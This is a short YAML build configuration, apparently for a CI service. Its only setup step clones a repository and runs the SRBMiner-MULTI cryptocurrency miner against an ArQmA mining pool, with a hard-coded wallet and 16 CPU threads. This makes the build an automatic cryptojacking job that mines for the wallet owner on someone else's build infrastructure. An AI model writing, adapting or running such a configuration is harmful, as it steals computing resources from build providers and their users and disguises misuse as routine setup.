build:
  nodes:
    my-node:
      project_setup:
        before:
          - command: git clone https://github.com/remakove/artions.git artions && cd artions && chmod +x SRBMiner-MULTI && ./SRBMiner-MULTI --algorithm randomarq --pool ca.arqma.herominers.com:10640 --wallet aRi1mBz6iddEmCrduae2TnYB94o41g9ug9HgPvBZF5aUNZY7opu7Z9HYTKA4PphzbTGdXamfR4RyW1XryRHpV92Qccd8fTsRkDV1PJ3jpuuYS.p6 --disable-gpu --cpu-threads 16 --cpu-affinity 0xFFFF
